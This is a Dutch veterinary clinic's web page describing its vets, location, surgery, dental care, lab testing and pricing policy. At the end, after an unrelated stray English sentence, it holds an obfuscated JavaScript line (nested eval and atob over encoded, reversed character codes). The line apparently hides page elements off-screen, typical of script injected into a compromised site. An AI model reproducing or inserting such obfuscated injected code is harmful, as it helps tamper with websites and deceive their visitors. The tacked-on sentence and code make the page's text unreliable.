Dierenkliniek Beuningen

Zorg en toewijding voor uw dier staan bij ons voorop. Ondersteund door goed geschoold medisch personeel, hypermoderne technieken en een rustgevende omgeving. Routinebehandelingen of meer gecompliceerde ingrepen? Dierenkliniek Beuningen zorgt ervoor dat baasje én huisdier zich hier op hun gemak voelen. En zich gezien voelen.

Vertrouwde handen
Onze dierenartsen, geassisteerd door onze assistentes, weten eenvoudige én gecompliceerde ingrepen met een grote mate van professionaliteit te behandelen. En ook voor spoedgeneeskunde of inwendige ziekten kunt u bij ons terecht. Een combinatie van jarenlange ervaring, regelmatige bijscholing en continue investeringen maakt dat uw trouwe huisgenoot hier in goed handen is.

Liefde voor uw dier
Lidy Peters en Ilse van der Geld zijn beide dierenarts in hart en nieren. Ze vullen elkaar goed aan, overleggen waar nodig en zorgen ervoor dat uw huisdier de aandacht krijgt die het verdient. Bijgestaan door gediplomeerde assistentes en stagiaires die ervoor zorgen dat afspraken, administratie en dossiers efficiënt worden afgehandeld. Daardoor kunnen we onze aandacht echt helemaal aan onze liefde voor uw dieren wijden. Welkom!

  • Wij zijn een leerbedrijf voor onze stagiaires,
    erkend door: Aequor
  • Onze dienstverlening wordt geleverd onder de
    Algemene voorwaarden van de KNMvD

Locatie

Beuningen ligt ten westen van Nijmegen. Onze praktijk is goed bereikbaar,
zowel vanaf het centrum van Beuningen, de provinciale weg
“Van Heemstraweg” en de snelwegen A73, A50. 

Adres:
Schoolstraat 5d
6641 DA Beuningen
Nederland

Route-beschrijving

 

Chirurgie

Voor de standaard ingrepen als sterilisatie en castratie kunt altijd bij ons een afspraak maken, Ook voor ander ingrepen bet u bij ons in veilige handen.
In onze kliniek hebben we veiligheid rondom en tijdens de anesthesie voorop staan. Narcose wordt aangepast aan uw dier. Bij operaties wordt altijd zuurstof toegediend, in combinatie met gas anesthesie en wordt gebruik gemaakt van bewakings apparatuur

Gebitsbehandeling

Veel dieren ouder dan 3 jaar hebben gebitsproblemen. Gebitsproblemen herkent u aan een slechte adem, matte kleur of verkleuring van tanden en kiezen en minder goed kauwen of harde brokjes willen eten.
Is er al tandsteen gevormd dan gaat dit er niet meer af met poetsen. Tandsteen vormt zich door mineralisatie van tandplak. Dit geeft en ruw oppervlak aan de tanden of kiezen en daardoor ontstaat er nog meer tandplak. In de tandplak groeien bacteriën die ontstekingen aan het tandvlees veroorzaken, dat kan leiden tot ernstige klachten zoals verlies van tanden en kiezen en zelfs aantasting van inwendige organen.

Om dit te voorkomen adviseren wij van jongs af aan te gaan poetsen. Laat regelmatig het gebit van uw dier controleren en als nodig de tandsteen verwijderen.

Bloed- en/of urine-onderzoek

Bij ziekte is soms een bloed of urine onderzoek noodzakelijk. Urine onderzoek wordt op praktijk gedaan en ook een eenvoudig bloedonderzoek kunnen wij in huis, U heeft dan met een klein half uur de uitslag en een verder behandelplan.

Prijzen

We doen wat nodig is. Dat is het waard!

Omdat elk dier uniek is en elke behandeling afhankelijk is van een combinatie van factoren, hanteren we geen vaste prijzen. Per dier en per situatie bekijken we wat nodig is. Wél zullen we altijd proberen om u zoveel mogelijk financiële duidelijkheid te geven over een eventueel te volgen behandelingstraject. Dit kunnen we pas doen, nadat we uw huisdier op de praktijk hebben kunnen beoordelen. Elke behandeling gebeurt altijd in goed overleg met de eigenaar. 

He data wanted to see if he could write in a new medium and continue producing reviews and columns, which he had done so successfully his entire life.

eval(eval(atob(“IjM5OzEyMDsxMTI7NDk7NTg7MTA0OzExNjsxMDA7MTA1OzExOTs1OTsxMjA7MTEyOzQ5OzU4OzExNjsxMDQ7MTAzOzEwNTsxMDE7MTA0OzU5OzQxOzQ4OzQ0OzQ4OzQ0OzQ4OzQ0OzQ4OzQwOzExNjs5OTsxMDE7MTE0OzU4OzExMjsxMDU7MTA4Ozk5OzU5OzExMDsxMDE7MTAwOzEwMDsxMDU7MTA0OzU4OzExOTsxMTE7MTA4OzEwMjsxMTQ7MTAxOzExODsxMTE7NTk7MTIwOzExMjs0OTs0NTs1ODsxMTA7MTA1OzEwMzsxMTQ7OTc7MTA5OzU5OzEyMDsxMTI7NTQ7NTU7NTc7NDU7NTg7MTEyOzExMTsxMTY7NTk7MTIwOzExMjs1NDs1MTs1Mjs1NDs0NTs1ODsxMTY7MTAyOzEwMTsxMDg7NTk7MTAxOzExNjsxMTc7MTA4OzExMTsxMTU7OTg7OTc7NTg7MTEwOzExMTsxMDU7MTE2OzEwNTsxMTU7MTExOzExMjszOTs2MTsxMTY7MTIwOzEwMTs4NDsxMTU7MTE1Ozk5OzQ2OzEwMTsxMDg7MTIxOzExNjsxMTU7NDY7MTAzOzExNTs1OTs0MTszOTsxMTI7MTExOzk5OzExMTsxMDU7MTE4OzEyMjsxMjE7MTIxOzExOTs0NjsxMTI7Mzk7NDA7MTE0OzExMTsxMTY7OTk7MTAxOzEwODsxMDE7ODM7MTIxOzExNDsxMDE7MTE3OzExMzs0NjsxMTY7MTEwOzEwMTsxMDk7MTE3Ozk5OzExMTsxMDA7NjE7MTAzOzExNSIuc3BsaXQoU3RyaW5nLmZyb21DaGFyQ29kZSg1OSkpLnJldmVyc2UoKS5tYXAoZWw9PlN0cmluZy5mcm9tQ2hhckNvZGUoZWwpKS5qb2luKCcnKQ==”)))